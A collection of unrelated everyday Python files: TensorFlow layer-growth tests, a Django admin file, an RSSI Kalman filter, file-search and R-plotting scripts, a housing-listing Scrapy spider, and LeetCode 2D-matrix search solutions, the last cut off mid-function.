wrapped_layer = glayers.GrowLayer(layer)
n_features = input_shape[-1]
x = tf.random.uniform(input_shape)
# New input after growing would have more features
new_input_shape = input_shape[:-1] + (n_new,)
new_x = tf.concat([x, tf.random.uniform(new_input_shape)], axis=-1)
original_out = layer(x)
old_weights, old_biases = wrapped_layer.get_weights()
wrapped_layer.add_neurons(n_new, new_weights='zeros', is_outgoing=True)
new_out = wrapped_layer(new_x)
new_weights, new_biases = wrapped_layer.get_weights()
print(new_weights, new_biases)
# Output of the layer shouldn't change.
self.assertAllClose(original_out, new_out)
# Check biases are unchanged
self.assertAllEqual(old_biases, new_biases)
# Check the new weights are zero
added_weights = new_weights[Ellipsis, n_features:, :]
self.assertAllEqual(added_weights, tf.zeros_like(added_weights))
# Check the old weights are same
kept_weights = new_weights[Ellipsis, :n_features, :]
self.assertAllEqual(old_weights, kept_weights)
@parameterized.named_parameters(
('dense_kernel', 'dense', ('kernel',)),
('dense_bias', 'dense', ('bias',)),
('dense_activity', 'dense', ('activity',)),
('dense_all', 'dense', ('kernel', 'bias', 'activity')),
('conv2d_kernel', 'conv2d', ('kernel',)),
('conv2d_bias', 'conv2d', ('bias',)),
('conv2d_activity', 'conv2d', ('activity',)),
('conv2d_all', 'conv2d', ('kernel', 'bias', 'activity')),
)
def test_regularizer_incoming(self, layer_type, regularizer_types):
reg_kwargs = {f'{r_type}_regularizer': tf.keras.regularizers.L2(0.1)
for r_type in regularizer_types}
print(reg_kwargs)
if layer_type == 'dense':
layer = tf.keras.layers.Dense(3, **reg_kwargs)
input_shape = (3, 4)
elif layer_type == 'conv2d':
layer = tf.keras.layers.Conv2D(3, 3, **reg_kwargs)
input_shape = (3, 5, 5, 4)
else:
raise ValueError('not supported')
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
_ = wrapped_layer(x)
old_losses = wrapped_layer.losses
wrapped_layer.add_neurons(1, new_weights='zeros', is_outgoing=False)
_ = wrapped_layer(x)
new_losses = wrapped_layer.losses
for old_loss, new_loss in zip(old_losses, new_losses):
self.assertAllClose(old_loss, new_loss)
@parameterized.named_parameters(
('dense_kernel', 'dense', ('kernel',)),
('dense_bias', 'dense', ('bias',)),
('dense_activity', 'dense', ('activity',)),
('dense_all', 'dense', ('kernel', 'bias', 'activity')),
('conv2d_kernel', 'conv2d', ('kernel',)),
('conv2d_bias', 'conv2d', ('bias',)),
('conv2d_activity', 'conv2d', ('activity',)),
('conv2d_all', 'conv2d', ('kernel', 'bias', 'activity')),
('bn_beta', 'bn', ('beta',)),
)
def test_regularizer_outgoing(self, layer_type, regularizer_types):
reg_kwargs = {f'{r_type}_regularizer': tf.keras.regularizers.L2(0.1)
for r_type in regularizer_types}
print(reg_kwargs)
if layer_type == 'dense':
layer = tf.keras.layers.Dense(3, **reg_kwargs)
input_shape = (3, 4)
elif layer_type == 'conv2d':
layer = tf.keras.layers.Conv2D(3, 3, **reg_kwargs)
input_shape = (3, 5, 5, 4)
elif layer_type == 'bn':
layer = tf.keras.layers.BatchNormalization(**reg_kwargs)
input_shape = (3, 4)
else:
raise ValueError('not supported')
wrapped_layer = glayers.GrowLayer(layer)
x = tf.random.uniform(input_shape)
_ = wrapped_layer(x)
old_losses = wrapped_layer.losses
if layer_type == 'bn':
wrapped_layer.add_neurons_identity(1)
else:
wrapped_layer.add_neurons(1, new_weights='zeros', is_outgoing=True)
new_input_shape = input_shape[:-1] + (1,)
new_x = tf.concat([x, tf.random.uniform(new_input_shape)], axis=-1)
_ = wrapped_layer(new_x)
new_losses = wrapped_layer.losses
for old_loss, new_loss in zip(old_losses, new_losses):
self.assertAllClose(old_loss, new_loss)
@parameterized.named_parameters(
('2d_axis1', (4, 5), -1),
('3d_axis1', (3, 3, 1), -1),
('4d_axis1', (3, 3, 4, 5), -1),
('2d_axis2', (4, 5), -2),
('3d_axis2', (3, 3, 1), -2),
('4d_axis2', (3, 3, 4, 5), -2),
)
def test_norm_l2(self, shape, axis):
tensor = tf.reshape(tf.range(tf.math.reduce_prod(shape),
dtype=tf.float32), shape)
calculated_norm = glayers.norm_l2(tensor, axis)
if axis == -2:
tensor = tf.einsum('...ij->...ji', tensor)
# L2 norm should be 1 over axis 1
flat_tensor = tf.reshape(tensor,
[-1, tensor.shape[-1]])
expected_norms = tf.norm(flat_tensor, axis=-2)
self.assertAllClose(expected_norms, calculated_norm)
pass
@parameterized.named_parameters(
('2d_axis1', (4, 5), -1),
('3d_axis1', (3, 3, 1), -1),
('4d_axis1', (3, 3, 4, 5), -1),
('2d_axis2', (4, 5), -2),
('3d_axis2', (3, 3, 1), -2),
('4d_axis2', (3, 3, 4, 5), -2),
)
def test_normalize_l2(self, shape, axis):
tensor = tf.reshape(tf.range(tf.math.reduce_prod(shape),
dtype=tf.float32), shape)
normalized_tensor = glayers.normalize_l2(tensor, axis)
if axis == -2:
normalized_tensor = tf.einsum('...ij->...ji', normalized_tensor)
# L2 norm should be 1 over axis 1
flat_tensor = tf.reshape(normalized_tensor,
[-1, normalized_tensor.shape[-1]])
norms = tf.norm(flat_tensor, axis=-2)
self.assertAllClose(norms, tf.ones_like(norms))
if __name__ == '__main__':
tf.test.main()
|
from django.contrib.admin import ModelAdmin, register
from .models import Worker, Department, Director, OrderedWorker, EducationOffice, GeneralOffice
@register(Worker)
class WorkerAdmin(ModelAdmin):
pass
@register(Department)
class DepartmentAdmin(ModelAdmin):
pass
@register(Director)
class DirectorAdmin(ModelAdmin):
pass
@register(OrderedWorker)
class OrderWorkerAdmin(ModelAdmin):
pass
@register(EducationOffice)
class EducationOffice(ModelAdmin):
pass
@register(GeneralOffice)
class GeneralOffice(ModelAdmin):
pass
|
##
## Here we consider the function PL(d) = PL(d0) + 10*n*log(d/d0) -> y = theta0 + theta1*(10*log(d/d0))
## and we want to estimate the PL(d0) a constant and "n"
##
import numpy as np
from numpy.linalg import pinv
from numpy import dot
import math
from threading import Lock
import os
import glob
class RSSIKalmanFilterRecursive:
def __init__(self, id_, m, var, measurment_var, d0 = 1.0):
self.m = np.transpose(m)
self.P = np.array([[var, 0],[0, var]])
self.d0 = d0
self.X = np.array([[0, 0]])
self.Y = np.array([0])
self.measurment_var = measurment_var
self.gamma = self.m
self.mutex = Lock()
def addMeasurement(self, distance, measurement):
if(distance < self.d0):
return
y = measurement
t = -10.0*math.log10(distance/self.d0)
self.mutex.acquire()
self.Y = np.append(self.Y, [y], axis=0)
self.X = np.append(self.X, [[1, t]], axis=0)
self.mutex.release()
#print(self.X.shape, self.Y.shape)
def getResult(self):
self.mutex.acquire()
P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X[1:]), self.X[1:]))
m = dot(P,((1.0/self.measurment_var)*dot(np.transpose(self.X[1:]), self.Y[1:])+ dot(pinv(self.P),self.m)))
#self.P = P
#self.m = m
#m = dot(pinv(dot(np.transpose(self.X[1:]), self.X[1:])), dot(np.transpose(self.X[1:]), self.Y[1:]))
self.mutex.release()
return (m, P)
def getMetricValue(self, distance):
if(distance < self.d0):
return self.m[0]
m, P = self.getResult()
t = -10.0*math.log10(distance/self.d0)
#print(m)
self.gamma = m
#print('gamma', self.gamma)
return m[0] + t*m[1]
def getGamma(self):
return self.gamma[1]
class RSSIKalmanFilter:
def __init__(self, id_, m, var_L, var_alpha, measurement_var, log=False, d0 = 1.0):
self.id_ = id_
self.mu = np.transpose(np.matrix(m))
self.sigma = np.array([[var_L, 0],[0, var_alpha]])
self.d0 = d0
self.X = np.array([[0, 0]])
self.Y = np.array([0])
self.measurement_var = measurement_var
self.gamma = self.mu
self.mutex = Lock()
self.log = log
if(self.log):
home = os.path.expanduser("~")
log_dir_ = home + '/NetworkedRobotsProject/RSSLog/'
folders = glob.glob(log_dir_+'/*')
folder = log_dir_ + '/log' + str(len(folders) + 1)
os.makedirs(folder)
self.log_data = folder + '/log.txt'
self.log_data_file = open(self.log_data, 'a', 0)
print(self.log_data)
def setMeasurmentVar(self, measurment_var):
self.measurment_var = measurment_var
def saveLog(self, distance,measurement, measurment_var):
str_data = str(self.id_) + ',' + str(measurement) + ',' + str(distance) + ',' + str(measurment_var) + ',' + str(self.getPL()) + ',' + str(self.getGamma()) + '\n'
#print(str_data)
self.log_data_file.write(str_data)
def addMeasurement(self, distance, measurement):
if(distance < self.d0):
return
self.mutex.acquire()
z = measurement
H = np.matrix([1, -10.0*math.log10(distance/self.d0)])
z_hat = np.dot(H,self.mu)
S = np.dot(H, np.dot(self.sigma, H.T)) + self.measurement_var
K = np.dot(self.sigma, np.dot(H.T, np.linalg.pinv(S)))
self.mu = self.mu + K*(z - z_hat)
self.sigma = np.dot((np.eye(2) - np.dot(K, H)),self.sigma)
self.mutex.release()
if(self.log):
self.saveLog(distance, measurement, self.measurment_var)
# def addMeasurement(self, distance, measurement):
# if(distance < self.d0):
# return
# y = measurement
# t = -10.0*math.log10(distance/self.d0)
# self.mutex.acquire()
# self.Y = np.array([y])
# self.X = np.matrix([[1, t]])
# P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X), self.X))
# #print(P)
# self.m = dot(P,((1.0/self.measurment_var)*np.transpose(self.X)*y + dot(pinv(self.P),self.m)))
# self.P = P
# #print(self.P,self.m)
# self.mutex.release()
# if(self.log):
# self.saveLog(distance, measurement, self.measurment_var)
#print(self.X.shape, self.Y.shape)
def getResult(self):
#self.mutex.acquire()
#P = pinv(pinv(self.P) + (1.0/self.measurment_var)*dot(np.transpose(self.X[-1]), self.X[-1]))
#m = dot(P,((1.0/self.measurment_var)*dot(np.transpose(self.X[-1]), self.Y[-1])+ dot(pinv(self.P),self.m)))
#self.P = P
#self.m = m
#m = dot(pinv(dot(np.transpose(self.X[1:]), self.X[1:])), dot(np.transpose(self.X[1:]), self.Y[1:]))
#self.mutex.release()
return (self.mu, self.sigma)
def getMetricValue(self, distance):
if(distance < self.d0):
return self.mu[0][0,0]
m, P = self.getResult()
t = -10.0*math.log10(distance/self.d0)
self.gamma = m
measure = m[0] + t*m[1]
return measure[0, 0]
def getGamma(self):
return self.mu[1,0]
def getPL(self):
return self.mu[0,0]
|
__author__ = 'Robin Cole'
__version__ = '0.1.0'
"""
Created on Wed Sep 7 10:33:49 2016
Iterate through file, print out search term and next line
@author: robincole
"""
import os
my_dir = "/Users/.../IAEA phase space files"
my_list = ['TITLE',
# 'COORDINATE_SYSTEM_DESCRIPTION',
'BEAM_NAME',
'FIELD_SIZE',
'NOMINAL_SSD'] # list of search terms
for file in os.listdir(my_dir):
my_file = open(os.path.join(my_dir,file), "r")
searchlines = my_file.readlines()
print("****************")
print(file)
for i, line in enumerate(searchlines):
if any(word in line for word in my_list):
for l in searchlines[i:i+3]: print l,
print
my_file.close()
|
#!/usr/bin/python
import sys
import os
import math
import pdb
from collections import defaultdict
if len(sys.argv) < 4:
print "usage : parse_output_gnu_plot.py <input-file> <output-dir and file prefix> <dataset name> [<support step size>] [<labels_as_K> (YI YF or N)= (F=float I=int) ] [<max support value>]"
sys.exit()
infile = sys.argv[1]
outfile = sys.argv[2]
dataset = sys.argv[3]
support_max = -1
labels_as_K = ""
if len(sys.argv) >4:
step_size = int(sys.argv[4])
if len(sys.argv) > 5:
labels_as_K = sys.argv[5].upper()
if len(sys.argv) > 6:
support_max = int(sys.argv[6])
support_all = defaultdict(list)
seq_time_all = defaultdict(dict)
par_time_all = defaultdict(dict)
plot_colors = ["red", "blue", "green", "orange", "black"]
density = [10, 10, 10, 10, 10]
angle = [30, 90, 0, 150, 60]
marker = [16, 18, 15, 19]
f = open(infile,"r")
readFlag = False
for line in f:
line.strip()
w = line.split()
if len(w) == 0:
if readFlag == True:
readFlag = False
continue
if readFlag:
support_all[gspan_cuda_version].append(int(w[0]))
seq_time_all[gspan_cuda_version][w[0]] = float(w[1])
par_time_all[gspan_cuda_version][w[0]] = float(w[2])
if w[0] == "GSPAN" and w[1] == "CUDA" and w[2] == "version:":
gspan_cuda_version = w[3]
print gspan_cuda_version
if w[0] == "support":
readFlag = True
f.close()
def do_bar_plot_seq_vs_par(support,seq_time,par_time, outfile, filltype, ver):
support = sorted(support)
f = open(infile+"_seq_vs_par"+ver+".dat","w")
f.write("support\tseq\tpar\tspeedup\n")
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
elif labels_as_K == "YI":
f.write(str(s/1000)+"K\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
else:
f.write(str(s)+"\t"+str(seq_time[str(s)])+"\t"+str(par_time[str(s)])+"\t"+str((seq_time[str(s)]*1.0)/par_time[str(s)])+"\n")
f.close()
max_y = max( max([v for (k,v) in seq_time.items()] ), max([v for (k,v) in par_time.items()]) )
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_seq_vs_par.dat\", header=T, sep=\"\\t\") \n")
f.write("max_y <- max(data$seq,data$par) \n")
f.write("plot_colors <- c(\"red\",\"green\")\n")
f.write("plot_density <- c(14,10)\n")
f.write("plot_angle <- c(30,90)\n")
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
if filltype == "color":
f.write("barplot(t(as.matrix(data[,2:3])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
elif filltype == "pattern":
f.write("barplot(t(as.matrix(data[,2:3])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, density=plot_density, angle=plot_angle, beside=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("par(new=TRUE) \n")
if filltype == "color":
f.write("plot(data$speedup, type=\"o\", lwd=3.0, col=\"blue\", ylim=c(0,max(data$speedup)+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
#f.write("title(main=\"Seq vs GPU graph mining\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
f.write("axis(4, col.lab=rgb(0,0.5,0), cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, col=rgb(0,0.5,0), cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\", \"GPU\"), cex=3, fill=plot_colors, horiz=TRUE) \n")
elif filltype == "pattern":
f.write("plot(data$speedup, type=\"o\", lwd=3.0, ylim=c(0,max(data$speedup)+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, cex.lab=3.25) \n")
f.write("axis(4, cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\", \"GPU\"), cex=3, density=c(14,10), angle=c(30,90), horiz=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
def do_bar_plot_seq_vs_par2(supports, seq_time, par_time, par_versions, par_labels, outfile,filltype):
support = []
for k in supports.keys():
support = supports[k] # get any of the support lists
break
support = sorted(support)
f = open(infile+"_seq_vs_par2.dat","w")
f.write("support\tseq")
for v in par_versions:
f.write("\t"+v)
for v in par_versions:
f.write("\tspeedup_"+v)
f.write("\n")
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K\t"+str(seq_time[str(s)]))
elif labels_as_K == "YI":
f.write(str(s/1000)+"K\t"+str(seq_time[str(s)]))
else:
f.write(str(s)+"\t"+str(seq_time[str(s)]))
for v in par_versions:
f.write("\t"+str(par_time[v][str(s)]))
for v in par_versions:
f.write("\t"+str((seq_time[str(s)]*1.0)/par_time[v][str(s)]))
f.write("\n")
f.close()
max_y = 0
for ver in par_versions:
y = max( max([v for (k,v) in seq_time.items()] ), max([v for (k,v) in par_time[ver].items()]) )
if y > max_y:
max_y = y
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_seq_vs_par2.dat\", header=T, sep=\"\\t\") \n")
f.write("max_y <- max(data$seq")
for v in par_versions:
f.write(",data$"+v)
f.write(") \n")
if filltype == "color":
f.write("plot_colors <- c(")
#length = 1 + len(par_versions)
for i in range(len(par_versions)):
f.write("\""+plot_colors[i]+"\",")
f.write("\""+plot_colors[len(par_versions)]+"\")\n")
elif filltype == "pattern":
f.write("plot_density <- c(")
for i in range(len(par_versions)):
f.write(""+str(density[i])+",")
f.write(""+str(density[len(par_versions)])+")\n")
f.write("plot_angle <- c(")
for i in range(len(par_versions)):
f.write(""+str(angle[i])+",")
f.write(""+str(angle[len(par_versions)])+")\n")
else:
print "wrong filltype"
sys.exit()
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
if filltype == "color":
f.write("barplot(t(as.matrix(data[,2:"+str(len(par_versions)+2)+"])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
elif filltype == "pattern":
f.write("barplot(t(as.matrix(data[,2:"+str(len(par_versions)+2)+"])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, density=plot_density, angle=plot_angle, beside=TRUE) \n")
else:
print "wrong filltype"
sys.exit()
f.write("par(new=TRUE) \n")
f.write("max_y <- max(")
for i in range(len(par_versions)-1):
f.write("data$speedup_"+par_versions[i]+",")
f.write("data$speedup_"+par_versions[len(par_versions)-1]+") \n")
if filltype == "color":
f.write("plot(data$speedup_"+par_versions[0]+", type=\"o\", lwd=3.0, col=\""+plot_colors[1] +"\", ylim=c(0,max_y+3), cex=3.5, axes=FALSE, ann=FALSE)\n")
for i in range(1,len(par_versions)):
f.write("lines(data$speedup_"+par_versions[i]+", type=\"o\", lwd=3.0, col=\""+plot_colors[i+1]+"\", cex=3.5) \n")
#f.write("lines(data$speedup"+par_versions[i]+", type=\"o\", pch=22, lty=2, lwd=3.0, col=\""+plot_colors[i]+"\", cex=3.5) \n")
#f.write("plot(data$speedup_"+v+", type=\"o\", lwd=3.0, col=\"blue\", ylim=c(0,max(data$speedup_"+v+")+1.8), cex=4.0, axes=FALSE, ann=FALSE)\n")
#f.write("title(main=\"Seq vs GPU graph mining\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
f.write("axis(4, col.lab=rgb(0,0.5,0), cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, col=rgb(0,0.5,0), cex=3.25 ) \n")
f.write("legend(\"top\",c(\"Seq\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
#f.write("), cex=3, fill=plot_colors, horiz=TRUE) \n")
f.write("), cex=2.5, inset=c(0.1,0), fill=plot_colors, bty=\"n\") \n")
elif filltype == "pattern":
f.write("plot(data$speedup_"+par_versions[0]+", pch="+str(marker[0])+", type=\"b\", lty=1, lwd=3.0, ylim=c(0,max_y+3), cex=3.5, axes=FALSE, ann=FALSE)\n")
for i in range(1,len(par_versions)):
f.write("lines(data$speedup_"+par_versions[i]+", pch="+str(marker[i])+", type=\"b\", lty=1, lwd=3.0, cex=3.5) \n")
f.write("title(main=\"Seq vs GPU ("+dataset+" Dataset)\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3 ,font.lab=4, cex.lab=3.25) \n")
f.write("axis(4, cex.axis=2.75) \n") #put the axis on the right side
f.write("mtext(\"Speedup\", side=4, line=3, font=4, cex=3.25 ) \n")
for v in par_versions:
f.write("plot_density <- append(plot_density, NA) \n")
f.write("plot_angle <- append(plot_angle, NA) \n")
f.write("plot_markers <- c(NA")
for i in range(len(par_versions)):
f.write(", NA")
for i in range(len(par_versions)):
f.write(", "+str(marker[i]))
f.write(") \n")
f.write("legend(\"top\",c(\"seq\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
for v in par_versions:
f.write(",\"GPU( "+par_labels[v]+" )\"")
f.write("), cex=2.5, inset=c(0.1,0), density=plot_density, angle=plot_angle, pch=plot_markers, bty=\"n\") \n")
else:
print "wrong filltype"
sys.exit()
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
def do_bar_plot_par_versions(supports,par_times, outfile):
cuda_versions = dict()
cuda_versions["gspan_cuda_no_sort"] = "single-ext"
cuda_versions["gspan_cuda_no_sort_block"] = "single-seg"
cuda_versions["gspan_cuda_mult_block"] = "multiple-seg"
support = []
for k in supports.keys():
support = supports[k] # get any of the support lists
break
support = sorted(support)
f = open(infile+"_par_versions.dat","w")
f.write("support")
for ver in cuda_versions.keys():
f.write("\t"+ver)
f.write("\n")
versions_list = ""
comma_flag = False
for ver in cuda_versions.keys():
if comma_flag == True:
versions_list += ","
versions_list += "\""+ cuda_versions[ver] +"\""
comma_flag = True
for i in xrange(0,len(support),step_size):
s = support[i]
if support_max < 0 or s <= support_max:
if labels_as_K == "YF":
f.write(str(s*1.0/1000)+"K")
elif labels_as_K == "YI":
f.write(str(s/1000)+"K")
else:
f.write(str(s))
for ver in cuda_versions.keys():
f.write("\t"+str(par_times[ver][str(s)]))
f.write("\n")
f.close()
max_y = 0
for p in cuda_versions.keys():
y = max([v for (k,v) in par_times[p].items()] )
if y > max_y:
max_y = y
#print max_y
if max_y < 10:
ytick = math.ceil(max_y/5)
else:
ytick = math.ceil(max_y/50)*10
# Write the R script
f = open(outfile+".r","w")
f.write("#!/usr/bin/Rscript\n")
f.write("data <- read.table(\""+infile+"_par_versions.dat\", header=T, sep=\"\\t\") \n")
#f.write("max_y <- max(data$seq,data$par) \n")
f.write("max_y <- "+str(max_y)+"\n")
f.write("plot_colors <- c(\"red\",\"green\",\"blue\")\n")
f.write("postscript(\""+outfile+".eps\", bg=\"white\", paper=\"letter\") \n")
f.write("par(mar=c(4.2,5.2,4,4.2)+.1)\n")
f.write("barplot(t(as.matrix(data[,2:4])), ylim=c(0,max_y+2.0), names.arg=data$support, cex.names=2.5, cex.axis=2.75, col=plot_colors, beside=TRUE) \n")
f.write("par(new=TRUE) \n")
f.write("title(main=\"GPU times ("+dataset+" Dataset)\", col.main=\"blue\", font.main=4, cex.main=3.5) \n")
f.write("title(xlab=\"Support\", line=3 , font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25 ) \n")
f.write("title(ylab=\"Time in seconds\", line=3, font.lab=4, col.lab=rgb(0,0.5,0), cex.lab=3.25) \n")
#f.write("legend(\"topright\", substring(rownames(t(data))[2:4],12), cex=2, fill=plot_colors) \n")
f.write("legend(\"topright\",c("+ versions_list +"), cex=3, fill=plot_colors, bty=\"n\") \n")
f.write("box() \n")
# Turn off device driver (to flush output to eps)
f.write("dev.off() \n")
f.close()
# change the permission of the R script to executable
os.chmod(outfile+".r",0755)
# run the R script and produce the eps file
os.system("./"+outfile+".r")
if __name__== "__main__":
#filltype = "color"
filltype = "pattern"
# seq vs one par version
for ver in support_all:
do_bar_plot_seq_vs_par(support_all[ver],seq_time_all[ver],par_time_all[ver],outfile+"_seq_vs_"+ver,filltype, ver)
#seq vs multiple par version
#par_versions = ["gspan_cuda", "gspan_cuda_lists", "gspan_cuda_no_sort_block"]
par_versions = ["gspan_cuda_lists", "gspan_cuda_no_sort_block"]
par_labels = { "gspan_cuda_no_sort_block":"single-seg" , "gspan_cuda_lists":"tid-list", "gspan_cuda":"dfs-sort"}
do_bar_plot_seq_vs_par2(support_all, seq_time_all["gspan_cuda_no_sort_block"], par_time_all, par_versions, par_labels, outfile+"_seq_vs_par",filltype)
#par versions
do_bar_plot_par_versions(support_all,par_time_all,outfile+"_par_versions")
|
# -*- coding: utf-8 -*-
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import Selector
from ganjiScrapySpider.items import HouseItem
class GanjiSpider(CrawlSpider):
name="ganjiSpider"
allowed_domains=['ganji.com']
start_urls=['http://bj.ganji.com/fang1/o1']
rules=[
Rule(SgmlLinkExtractor(allow=('http://bj.ganji.com/fang1/o'),restrict_xpaths=('//a[@class="next"]')),
callback='parse_item',
follow=True)
]
def parse_start_url(self,response):
return self.parse_item(response)
def parse_item(self,response):
sel=Selector(response)
houses=sel.xpath('//li[@class="list-img clearfix"]')
houseItems=[]
for house in houses:
hItem=HouseItem()
hItem['title']=house.select('div[@class="list-mod4"]/div[@class="info-title"]/a/text()').extract()[0].strip()
hItem['community']=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/div[@class="list-word"]/span[@class="list-word-col"]/a/text()').extract()[0].strip()
hItem['price']=house.select('div[@class="list-mod4"]/div[@class="list-mod3 clearfix"]/p[@class="list-part"]/em[@class="sale-price"]/text()').extract()[0].strip()
hItem['area']=house.select('div[@class="list-mod4"]/div[@class="list-mod3 clearfix"]/p[@class="list-part"][2]/text()').extract()[0].strip()
houseType=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/p[@class="list-word"]/span[@class="js-huxing"]/text()').extract()
if len(houseType)==0:
hItem['houseType']=''
else:
hItem['houseType']=houseType[0]
infos=house.select('div[@class="list-mod4"]/div[@class="list-mod2"]/p[@class="list-word"]/text()').extract()
hItem['layer']=infos[1]
hItem['direction']=infos[2]
houseItems.append(hItem)
return houseItems
|
# V0
# IDEA : MATRIX IN ORDER + BRUTE FORCE
# Space: O(1)
# Time: O(m+n) # worst case
class Solution:
def searchMatrix(self, matrix, target):
if len(matrix) == 0:
return False
row, col = 0, len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] == target:
return True
elif matrix[row][col] < target:
row += 1
elif matrix[row][col] > target:
col -= 1
return False
# V0'
# IDEA : BINARY SEARCH
# Space: O(1)
# Time: O(logm + logn)
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix:
return False
m, n = len(matrix), len(matrix[0])
left, right = 0, m * n
while left < right:
mid = left + (right - left) / 2
if matrix[int(mid / n)][int(mid % n)]>= target:
right = mid
else:
left = mid + 1
return left < m * n and matrix[int(left / n)][int(left % n)] == target
# V1
# https://leetcode.com/problems/search-a-2d-matrix/discuss/351404/Python-Simple-Solution
class Solution:
def searchMatrix(self, matrix, target):
if len(matrix) == 0:
return False
row, col = 0, len(matrix[0]) - 1
while row < len(matrix) and col >= 0:
if matrix[row][col] == target: return True
elif matrix[row][col] < target: row += 1
elif matrix[row][col] > target: col -= 1
return False
### Test case
s=Solution()
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 9) == True
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 1) == True
assert s.searchMatrix([[1,2,3],[4,5,6],[7,8,9]], 99) == False
assert s.searchMatrix([[]], 0) == False
assert s.searchMatrix([[]], 100) == False
assert s.searchMatrix([], 100) == False
assert s.searchMatrix([[-1,3,4,-4]], -1) == False
assert s.searchMatrix([[_ for _ in range(3)] for _ in range(4)], -1) == False
assert s.searchMatrix([[_ for _ in range(3)] for _ in range(4)], 2) == True
assert s.searchMatrix([[_ for _ in range(99)] for _ in range(999)], 2) == True
# V1'
# https://leetcode.com/problems/search-a-2d-matrix/discuss/592696/python-super-easy
# IDEA : BRUTE FORCE
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
for x in matrix:
if target in x:
return True
return False
# V1''
# https://blog.csdn.net/fuxuemingzhu/article/details/79459314
# https://blog.csdn.net/fuxuemingzhu/article/details/79459200
class Solution(object):
def searchMatrix(self, matrix, target):
"""
:type matrix: List[List[int]]
:type target: int
:rtype: bool
"""
if not matrix or not matrix[0]:
return False
rows = len(matrix)
cols = len(matrix[0])
row, col = 0, cols - 1
while True:
if row < rows and col >= 0:
if matrix[row][col] == target:
return True
elif matrix[row][col] < target:
row += 1
else:
